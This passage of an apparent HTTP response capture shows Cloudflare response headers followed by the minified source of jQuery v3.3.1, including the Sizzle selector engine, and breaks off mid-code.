          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bO3KUvuhSkW0NwDvKo9mmn93tbYBJhR24DYcpLQFDAbmDkUzEAXESS1tj005TvZVeZvsve9D3JNKou77mPKmFxMQ%2BOuhW3A7OPTCrdQd4C%2B9kEY4ncKHlY92Wz8fJHY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a4bccae96b2d-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (86927 bytes)
          /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */
          !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:"jQuery"+("3.3.1"+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==c.call(e))&&(!(t=i(e))||"function"==typeof(n=f.call(t,"constructor")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),"function"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function C(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b="sizzle"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",R="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",I="\\["+M+"*("+R+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+R+"))|)"+M+"*\\]",W=":("+R+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+I+")*)|.*)\\)|)",$=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),F=new RegExp("^"+M+"*,"+M+"*"),_=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),z=new RegExp("="+M+"*([^\\]'\"]*?)"+M+"*\\]","g"),X=new RegExp(W),U=new RegExp("^"+R+"$"),V={ID:new RegExp("^#("+R+")"),CLASS:new RegExp("^\\.("+R+")"),TAG:new RegExp("^("+R+"|[*])"),ATTR:new RegExp("^"+I),PSEUDO:new RegExp("^"+W),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+P+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},G=/^(?:input|select|textarea|button)$/i,Y=/^h\d$/i,Q=/^[^{]+\{\s*\[native \w/,J=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,K=/[+~]/,Z=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),ee=function(e,t,n){var r="0x"+t-65536;return r!==r||n?t:r<0?String.fromCharCode(r+65536):String.fromCharCode(r>>10|55296,1023&r|56320)},te=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ne=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},re=function(){p()},ie=me(function(e){return!0===e.disabled&&("form"in e||"label"in e)},{dir:"parentNode",next:"legend"});try{L.apply(A=H.call(w.childNodes),w.childNodes),A[w.childNodes.length].nodeType}catch(e){L={apply:A.length?function(e,t){q.apply(e,H.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function oe(e,t,r,i){var o,s,l,c,f,h,v,m=t&&t.ownerDocument,T=t?t.nodeType:9;if(r=r||[],"string"!=typeof e||!e||1!==T&&9!==T&&11!==T)return r;if(!i&&((t?t.ownerDocument||t:w)!==d&&p(t),t=t||d,g)){if(11!==T&&(f=J.exec(e)))if(o=f[1]){if(9===T){if(!(l=t.getElementById(o)))return r;if(l.id===o)return r.push(l),r}else if(m&&(l=m.getElementById(o))&&x(t,l)&&l.id===o)return r.push(l),r}else{if(f[2])return L.apply(r,t.getElementsByTagName(e)),r;if((o=f[3])&&n.getElementsByClassName&&t.getElementsByClassName)return L.apply(r,t.getElementsByClassName(o)),r}if(n.qsa&&!S[e+" "]&&(!y||!y.test(e))){if(1!==T)m=t,v=e;else if("object"!==t.nodeName.toLowerCase()){(c=t.getAttribute("id"))?c=c.replace(te,ne):t.setAttribute("id",c=b),s=(h=a(e)).length;while(s--)h[s]="#"+c+" "+ve(h[s]);v=h.join(","),m=K.test(e)&&ge(t.parentNode)||t}if(v)try{return L.apply(r,m.querySelectorAll(v)),r}catch(e){}finally{c===b&&t.removeAttribute("id")}}}return u(e.replace(B,"$1"),t,r,i)}function ae(){var e=[];function t(n,i){return e.push(n+" ")>r.cacheLength&&delete t[e.shift()],t[n+" "]=i}return t}function se(e){return e[b]=!0,e}function ue(e){var t=d.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function le(e,t){var n=e.split("|"),i=n.length;while(i--)r.attrHandle[n[i]]=t}function ce(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&e.sourceIndex-t.sourceIndex;if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function fe(e){return function(t){return"input"===t.nodeName.toLowerCase()&&t.type===e}}function pe(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function de(e){return function(t){return"form"in t?t.parentNode&&!1===t.disabled?"label"in t?"label"in t.parentNode?t.parentNode.disabled===e:t.disabled===e:t.isDisabled===e||t.isDisabled!==!e&&ie(t)===e:t.disabled===e:"label"in t&&t.disabled===e}}function he(e){return se(function(t){return t=+t,se(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}function ge(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}n=oe.support={},o=oe.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return!!t&&"HTML"!==t.nodeName},p=oe.setDocument=function(e){var t,i,a=e?e.ownerDocument||e:w;return a!==d&&9===a.nodeType&&a.documentElement?(d=a,h=d.documentElement,g=!o(d),w!==d&&(i=d.defaultView)&&i.top!==i&&(i.addEventListener?i.addEventListener("unload",re,!1):i.attachEvent&&i.attachEvent("onunload",re)),n.attributes=ue(function(e){return e.className="i",!e.getAttribute("className")}),n.getElementsByTagName=ue(function(e){return e.appendChild(d.createComment("")),!e.getElementsByTagName("*").length}),n.getElementsByClassName=Q.test(d.getElementsByClassName),n.getById=ue(function(e){return h.appendChild(e).id=b,!d.getElementsByName||!d.getElementsByName(b).length}),n.getById?(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){return e.getAttribute("id")===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n=t.getElementById(e);return n?[n]:[]}}):(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){var n="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return n&&n.value===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),r.find.TAG=n.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):n.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},r.find.CLASS=n.getElementsByClassName&&function(e,t){if("undefined"!=typeof t.getElementsByClassName&&g)return t.getElementsByClassName(e)},v=[],y=[],(n.qsa=Q.test(d.querySelectorAll))&&(ue(function(e){h.appendChild(e).innerHTML="<a id='"+b+"'></a><select id='"+b+"-\r\\' msallowcapture=''><option selected=''></option></select>",e.querySelectorAll("[msallowcapture^='']").length&&y.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||y.push("\\["+M+"*(?:value|"+P+")"),e.querySelectorAll("[id~="+b+"-]").length||y.push("~="),e.querySelectorAll(":checked").length||y.push(":checked"),e.querySelectorAll("a#"+b+"+*").length||y.push(".#.+[+~]")}),ue(function(e){e.innerHTML="<a href='' disabled='disabled'></a><select disabled='disabled'><option/></select>";var t=d.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&y.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&y.push(":enabled",":disabled"),h.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&y.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),y.push(",.*:")})),(n.matchesSelector=Q.test(m=h.matches||h.webkitMatchesSelector||h.mozMatchesSelector||h.oMatchesSelector||h.msMatchesSelector))&&ue(function(e){n.disconnectedMatch=m.call(e,"*"),m.call(e,"[s!='']:x"),v.push("!=",W)}),y=y.length&&new RegExp(y.join("|")),v=v.length&&new RegExp(v.join("|")),t=Q.test(h.compareDocumentPosition),x=t||Q.test(h.contains)?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},D=t?function(e,t){if(e===t)return f=!0,0;var r=!e.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(e.ownerDocument||e)===(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!n.sortDetached&&t.compareDocumentPosition(e)===r?e===d||e.ownerDocument===w&&x(w,e)?-1:t===d||t.ownerDocument===w&&x(w,t)?1:c?O(c,e)-O(c,t):0:4&r?-1:1)}:function(e,t){if(e===t)return f=!0,0;var n,r=0,i=e.parentNode,o=t.parentNode,a=[e],s=[t];if(!i||!o)return e===d?-1:t===d?1:i?-1:o?1:c?O(c,e)-O(c,t):0;if(i===o)return ce(e,t);n=e;while(n=n.parentNode)a.unshift(n);n=t;while(n=n.parentNode)s.unshift(n);while(a[r]===s[r])r++;return r?ce(a[r],s[r]):a[r]===w?-1:s[r]===w?1:0},d):d},oe.matches=function(e,t){return oe(e,null,null,t)},oe.matchesSelector=function(e,t){if((e.ownerDocument||e)!==d&&p(e),t=t.replace(z,"='$1']"),n.matchesSelector&&g&&!S[t+" "]&&(!v||!v.test(t))&&(!y||!y.test(t)))try{var r=m.call(e,t);if(r||n.disconnectedMatch||e.document&&11!==e.document.nodeType)return r}catch(e){}return oe(t,d,null,[e]).length>0},oe.contains=function(e,t){return(e.ownerDocument||e)!==d&&p(e),x(e,t)},oe.attr=function(e,t){(e.ownerDocument||e)!==d&&p(e);var i=r.attrHandle[t.toLowerCase()],o=i&&N.call(r.attrHandle,t.toLowerCase())?i(e,t,!g):void 0;return void 0!==o?o:n.attributes||!g?e.getAttribute(t):(o=e.getAttributeNode(t))&&o.specified?o.value:null},oe.escape=function(e){return(e+"").replace(te,ne)},oe.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},oe.uniqueSort=function(e){var t,r=[],i=0,o=0;if(f=!n.detectDuplicates,c=!n.sortStable&&e.slice(0),e.sort(D),f){while(t=e[o++])t===e[o]&&(i=r.push(o));while(i--)e.splice(r[i],1)}return c=null,e},i=oe.getText=function(e){var t,n="",r=0,o=e.nodeType;if(o){if(1===o||9===o||11===o){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=i(e)}else if(3===o||4===o)return e.nodeValue}else while(t=e[r++])n+=i(t);return n},(r=oe.selectors={cacheLength:50,createPseudo:se,match:V,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(Z,ee),e[3]=(e[3]||e[4]||e[5]||"").replace(Z,ee),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||oe.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&oe.error(e[0]),e},PSEUDO:function(e){var t,n=!e[6]&&e[2];return V.CHILD.test(e[0])?null:(e[3]?e[2]=e[4]||e[5]||"":n&&X.test(n)&&(t=a(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(Z,ee).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=E[e+" "];return t||(t=new RegExp("(^|"+M+")"+e+"("+M+"|$)"))&&E(e,function(e){return t.test("string"==typeof e.className&&e.className||"undefined"!=typeof e.getAttribute&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=oe.attr(r,e);return null==i?"!="===t:!t||(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i.replace($," ")+" ").indexOf(n)>-1:"|="===t&&(i===n||i.slice(0,n.length+1)===n+"-"))}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,u){var l,c,f,p,d,h,g=o!==a?"nextSibling":"previousSibling",y=t.parentNode,v=s&&t.nodeName.toLowerCase(),m=!u&&!s,x=!1;if(y){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===v:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?y.firstChild:y.lastChild],a&&m){x=(d=(l=(c=(f=(p=y)[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]||[])[0]===T&&l[1])&&l[2],p=d&&y.childNodes[d];while(p=++d&&p&&p[g]||(x=d=0)||h.pop())if(1===p.nodeType&&++x&&p===t){c[e]=[T,d,x];break}}else if(m&&(x=d=(l=(c=(f=(p=t)[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]||[])[0]===T&&l[1]),!1===x)while(p=++d&&p&&p[g]||(x=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===v:1===p.nodeType)&&++x&&(m&&((c=(f=p[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]=[T,x]),p===t))break;return(x-=i)===r||x%r==0&&x/r>=0}}},PSEUDO:function(e,t){var n,i=r.pseudos[e]||r.setFilters[e.toLowerCase()]||oe.error("unsupported pseudo: "+e);return i[b]?i(t):i.length>1?(n=[e,e,"",t],r.setFilters.hasOwnProperty(e.toLowerCase())?se(function(e,n){var r,o=i(e,t),a=o.length;while(a--)e[r=O(e,o[a])]=!(n[r]=o[a])}):function(e){return i(e,0,n)}):i}},pseudos:{not:se(function(e){var t=[],n=[],r=s(e.replace(B,"$1"));return r[b]?se(function(e,t,n,i){var o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),t[0]=null,!n.pop()}}),has:se(function(e){return function(t){return oe(e,t).length>0}}),contains:se(function(e){return e=e.replace(Z,ee),function(t){return(t.textContent||t.innerText||i(t)).indexOf(e)>-1}}),lang:se(function(e){return U.test(e||"")||oe.error("unsupported lang: "+e),e=e.replace(Z,ee).toLowerCase(),function(t){var n;do{if(n=g?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return(n=n.toLowerCase())===e||0===n.indexOf(e+"-")}while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===h},focus:function(e){return e===d.activeElement&&(!d.hasFocus||d.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:de(!1),disabled:de(!0),checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,!0===e.selected},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!r.pseudos.empty(e)},header:function(e){return Y.test(e.nodeName)},input:function(e){return G.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||"text"===t.toLowerCase())},first:he(function(){return[0]}),last:he(function(e,t){return[t-1]}),eq:he(function(e,t,n){return[n<0?n+t:n]}),even:he(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:he(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:he(function(e,t,n){for(var r=n<0?n+t:n;--r>=0;)e.push(r);return e}),gt:he(function(e,t,n){for(var r=n<0?n+t:n;++r<t;)e.push(r);return e})}}).pseudos.nth=r.pseudos.eq;for(t in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})r.pseudos[t]=fe(t);for(t in{submit:!0,reset:!0})r.pseudos[t]=pe(t);function ye(){}ye.prototype=r.filters=r.pseudos,r.setFilters=new ye,a=oe.tokenize=function(e,t){var n,i,o,a,s,u,l,c=k[e+" "];if(c)return t?0:c.slice(0);s=e,u=[],l=r.preFilter;while(s){n&&!(i=F.exec(s))||(i&&(s=s.slice(i[0].length)||s),u.push(o=[])),n=!1,(i=_.exec(s))&&(n=i.shift(),o.push({value:n,type:i[0].replace(B," ")}),s=s.slice(n.length));for(a in r.filter)!(i=V[a].exec(s))||l[a]&&!(i=l[a](i))||(n=i.shift(),o.push({value:n,type:a,matches:i}),s=s.slice(n.length));if(!n)break}return t?s.length:s?oe.error(e):k(e,u).slice(0)};function ve(e){for(var t=0,n=e.length,r="";t<n;t++)r+=e[t].value;return r}function me(e,t,n){var r=t.dir,i=t.next,o=i||r,a=n&&"parentNode"===o,s=C++;return t.first?function(t,n,i){while(t=t[r])if(1===t.nodeType||a)return e(t,n,i);return!1}:function(t,n,u){var l,c,f,p=[T,s];if(u){while(t=t[r])if((1===t.nodeType||a)&&e(t,n,u))return!0}else while(t=t[r])if(1===t.nodeType||a)if(f=t[b]||(t[b]={}),c=f[t.uniqueID]||(f[t.uniqueID]={}),i&&i===t.nodeName.toLowerCase())t=t[r]||t;else{if((l=c[o])&&l[0]===T&&l[1]===s)return p[2]=l[2];if(c[o]=p,p[2]=e(t,n,u))return!0}return!1}}function xe(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function be(e,t,n){for(var r=0,i=t.length;r<i;r++)oe(e,t[r],n);return n}function we(e,t,n,r,i){for(var o,a=[],s=0,u=e.length,l=null!=t;s<u;s++)(o=e[s])&&(n&&!n(o,r,i)||(a.push(o),l&&t.push(s)));return a}function Te(e,t,n,r,i,o){return r&&!r[b]&&(r=Te(r)),i&&!i[b]&&(i=Te(i,o)),se(function(o,a,s,u){var l,c,f,p=[],d=[],h=a.length,g=o||be(t||"*",s.nodeType?[s]:s,[]),y=!e||!o&&t?g:we(g,p,e,s,u),v=n?i||(o?e:h||r)?[]:a:y;if(n&&n(y,v,s,u),r){l=we(v,d),r(l,[],s,u),c=l.length;while(c--)(f=l[c])&&(v[d[c]]=!(y[d[c]]=f))}if(o){if(i||e){if(i){l=[],c=v.length;while(c--)(f=v[c])&&l.push(y[c]=f);i(null,v=[],l,u)}c=v.length;while(c--)(f=v[c])&&(l=i?O(o,f):p[c])>-1&&(o[l]=!(a[l]=f))}}else v=we(v===a?v.splice(h,v.length):v),i?i(null,a,v,u):L.apply(a,v)})}function Ce(e){for(var t,n,i,o=e.length,a=r.relative[e[0].type],s=a||r.relative[" "],u=a?1:0,c=me(function(e){return e===t},s,!0),f=me(function(e){return O(t,e)>-1},s,!0),p=[function(e,n,r){var i=!a&&(r||n!==l)||((t=n).nodeType?c(e,n,r):f(e,n,r));return t=null,i}];u<o;u++)if(n=r.relative[e[u].type])p=[me(xe(p),n)];else{if((n=r.filter[e[u].type].apply(null,e[u].matches))[b]){for(i=++u;i<o;i++)if(r.relative[e[i].type])break;return Te(u>1&&xe(p),u>1&&ve(e.slice(0,u-1).concat({value:" "===e[u-2].type?"*":""})).replace(B,"$1"),n,u<i&&Ce(e.slice(u,i)),i<o&&Ce(e=e.slice(i)),i<o&&ve(e))}p.push(n)}return xe(p)}function Ee(e,t){var n=t.length>0,i=e.length>0,o=function(o,a,s,u,c){var f,h,y,v=0,m="0",x=o&&[],b=[],w=l,C=o||i&&r.find.TAG("*",c),E=T+=null==w?1:Math.random()||.1,k=C.length;for(c&&(l=a===d||a||c);m!==k&&null!=(f=C[m]);m++){if(i&&f){h=0,a||f.ownerDocument===d||(p(f),s=!g);while(y=e[h++])if(y(f,a||d,s)){u.push(f);break}c&&(T=E)}n&&((f=!y&&f)&&v--,o&&x.push(f))}if(v+=m,n&&m!==v){h=0;while(y=t[h++])y(x,b,a,s);if(o){if(v>0)while(m--)x[m]||b[m]||(b[m]=j.call(u));b=we(b)}L.apply(u,b),c&&!o&&b.length>0&&v+t.length>1&&oe.uniqueSort(u)}return c&&(T=E,l=w),x};return n?se(o):o}return s=oe.compile=function(e,t){var n,r=[],i=[],o=S[e+" "];if(!o){t||(t=a(e)),n=t.length;while(n--)(o=Ce(t[n]))[b]?r.push(o):i.push(o);(o=S(e,Ee(i,r))).selector=e}return o},u=oe.select=function(e,t,n,i){var o,u,l,c,f,p="function"==typeof e&&e,d=!i&&a(e=p.selector||e);if(n=n||[],1===d.length){if((u=d[0]=d[0].slice(0)).length>2&&"ID"===(l=u[0]).type&&9===t.nodeType&&g&&r.relative[u[1].type]){if(!(t=(r.find.ID(l.matches[0].replace(Z,ee),t)||[])[0]))return n;p&&(t=t.parentNode),e=e.slice(u.shift().value.length)}o=V.needsContext.test(e)?0:u.length;while(o--){if(l=u[o],r.relative[c=l.type])break;if((f=r.find[c])&&(i=f(l.matches[0].replace(Z,ee),K.test(u[0].type)&&ge(t.parentNode)||t))){if(u.splice(o,1),!(e=i.length&&ve(u)))return L.apply(n,i),n;break}}}return(p||s(e,d))(i,t,!g,n,!t||K.test(e)&&ge(t.parentNode)||t),n},n.sortStable=b.split("").sort(D).join("")===b,n.detectDuplicates=!!f,p(),n.sortDetached=ue(function(e){return 1&e.compareDocumentPosition(d.createElement("fieldset"))}),ue(function(e){return e.innerHTML="<a href='#'></a>","#"===e.firstChild.getAttribute("href")})||le("type|href|height|width",function(e,t,n){if(!n)return e.getAttribute(t,"type"===t.toLowerCase()?1:2)}),n.attributes&&ue(function(e){return e.innerHTML="<input/>",e.firstChild.setAttribute("value",""),""===e.firstChild.getAttribute("value")})||le("value",function(e,t,n){if(!n&&"input"===e.nodeName.toLowerCase())return e.defaultValue}),ue(function(e){return null==e.getAttribute("disabled")})||le(P,function(e,t,n){var r;if(!n)return!0===e[t]?t.toLowerCase():(r=e.getAttributeNode(t))&&r.specified?r.value:null}),oe}(e);w.find=E,w.expr=E.selectors,w.expr[":"]=w.expr.pseudos,w.uniqueSort=w.unique=E.uniqueSort,w.text=E.getText,w.isXMLDoc=E.isXML,w.contains=E.contains,w.escapeSelector=E.escape;var k=function(e,t,n){var r=[],i=void 0!==n;while((e=e[t])&&9!==e.nodeType)if(1===e.nodeType){if(i&&w(e).is(n))break;r.push(e)}return r},S=function(e,t){for(var n=[];e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n},D=w.expr.match.needsContext;function N(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}var A=/^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i;function j(e,t,n){return g(t)?w.grep(e,function(e,r){return!!t.call(e,r,e)!==n}):t.nodeType?w.grep(e,function(e){return e===t!==n}):"string"!=typeof t?w.grep(e,function(e){return u.call(t,e)>-1!==n}):w.filter(t,e,n)}w.filter=function(e,t,n){var r=t[0];return n&&(e=":not("+e+")"),1===t.length&&1===r.nodeType?w.find.matchesSelector(r,e)?[r]:[]:w.find.matches(e,w.grep(t,function(e){return 1===e.nodeType}))},w.fn.extend({find:function(e){var t,n,r=this.length,i=this;if("string"!=typeof e)return this.pushStack(w(e).filter(function(){for(t=0;t<r;t++)if(w.contains(i[t],this))return!0}));for(n=this.pushStack([]),t=0;t<r;t++)w.find(e,i[t],n);return r>1?w.uniqueSort(n):n},filter:function(e){return 